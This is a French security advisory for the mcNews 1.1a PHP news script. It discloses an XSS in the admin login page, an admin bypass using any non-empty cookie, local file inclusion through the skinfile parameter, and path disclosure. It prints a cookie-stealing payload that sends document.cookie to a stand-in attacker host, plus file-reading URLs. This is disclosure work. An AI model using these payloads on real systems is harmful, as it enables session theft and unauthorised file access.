mcNews
					******

Produit :
*********
mcNews
http://www.phpforums.net

Version :
*********
1.1a

Date :
******
17/05/02

Problèmes :
***********
- Path Disclosure
- Inclusion de fichiers
- XSS
- Accès à la partie administrative

Developpement :
***************

Commencons par un trou XSS. La page de connection admin se trouve à l'url /admin/login.php.
On peut modifier la valeur d'une variable 'path', qui est notée dans la source html
et qui sert normalement à donner l'endroit où se rendre si les login et pass sont bons.
Au lieu de rentrer login.php?path=index.php, on va entrer, par exemple :
/login.php?path="></form><form%20name=a><input%20name=i%20value=http://www.haxor.com/script.php?></form><script>window.open(document.a.i.value%2Bdocument.cookie)</script>
Cela donnera dans la source :
------------------------------------------------------------------------------
<form action="login.php" method="get">
[...]
<input type="hidden" name="path" value="
//----> Ici commence le code entré dans la variable path

\"></form><form name=a>
<input name=i value=http://www.haxor.com/script.php?>
<script>window.open(document.a.i.value+document.cookie)</script>

//---> Ici se termine le code éntré
">
[...]
</form>
------------------------------------------------------------------------------
Le "> sert donc à fermer l'input "path". On voit que la valeur de path vaut \,
car notre " a été remplacé par \". Ca pose un problème facilement réglable en cross site
scripting. Si par exemple on veut faire alert('hop'), alert(\'hop\') s'affichera
dans la source et le javascript ne sera pas executé.
On va donc utiliser la balise <form> pour ne pas avoir à utiliser des guillemets.

Une balise <form> n'est pas prise en compte si elle se trouve dans une autre balise <form>,
or c'est le cas. On met donc un </form> après le ">.

Dans notre <form> on met le texte à utiliser, puis on met le script.
Ici j'ai pris comme exemple une fenêtre qui s'ouvre et qui 
récupere le cookie.
Ceci pour montrer que le '+' doit être remplacé par %2B dans l'url
car sinon il sera compris comme un espace.
Comme on verra, récuperer le cookie de ce service est inutile.

On a pas besoin de fermer notre balise <form> dans l'url car elle sera fermée dans la source, 
et le "> qui fermait à la base le input path sera compris comme du texte.


Voyons maintenant la sécurité du dossier /admin/.
Dans les fichiers de ce repertoire, on peut voir :

------------------------------------------------------------
<?
$auth = explode(":",$HTTP_COOKIE_VARS["mcNews"]);
if(empty($auth[0])){
?> <script language="JavaScript">
   document.location.replace("login.php?path=<? echo("index.php"); ?>");
   </script>
<?
}
[...]
------------------------------------------------------------

Donc si la première partie du cookie mcNews est vide, on redirige vers login.php?path=index.php.
Il suffit donc d'envoyer un cookie avec comme nom mcNews et avec une valeur sur
une page admin pour y avoir accès, car le script ne vérifie pas si les infos contenues
dans le cookie sont bonnes.


Dans /admin/ecrire.php, on peut voir :

-------------------------------------------------------
$connect= mysql_connect($host,$login,$pass);
mysql_select_db($base, $connect);
$query = "select * from mcnews_design";
$row=mysql_fetch_array(mysql_query($query, $connect));
$skinfile=$row['skin'];
include("$skinfile");
-------------------------------------------------------

On ne peut pas utiliser le include("$skinfile"); pour inclure un fichier, car on lui
a trouvé une valeur dans la base de donnée.

Mais dans design.php, après l'authentification par cookies, on peut voir les lignes :

----------------------------
<?
}
include ("header.php");
if($voir!='') {
include("$skinfile");

}
[...]
----------------------------

Le créateur, pensant qu'on a déjà donné une valeur à $skinfile, ne pense pas à la lui
redéfinir dans design.php .
La seule condition, à part celle d'être admin, est que la valeur $voir ne soit pas vide.
On peut donc inclure nimporte quel fichier, par exemple un fichier du HD de cette façon :
http://www.site.com/admin/design.php?voir=1&skinfile=../../file/to/view

Si on va dans /admin/header.php, on peut y voir ce qu'on trouve d'habitude dans un header,
plus ces lignes :
----------------------
<?
if($voir!='') {
include ("$skinfile");
?>
----------------------
Donc les mêmes que design.php ... la difference est que dans header.php, il n'y a pas l'
authentification admin...
Pas besoin d'envoyer un cookie sur /admin/header.php?voir=hop&skinfile=../../file/to/view
pour afficher le fichier souhaité.
De plus, il faudra afficher la source HTML dans header.php, car le résultat de la requête
n'est pas affiché comme du texte, mais :

<html>
<head>
<style type="text/css">
<!--
--------------------> ICI, résultat de la requête <-----------------------
a:actif {  CONFIG}
a:link {  CONFIG}
a:visited {  CONFIG}
a:hover {  CONFIG}
-->
</style>
</head>
[...]

Dans ces deux fichiers se trouve aussi le path disclosure. Le path s'affichera si le $skinfile
n'existe pas.

Credits :
*********
frog-m@n
leseulfrog@hotmail.com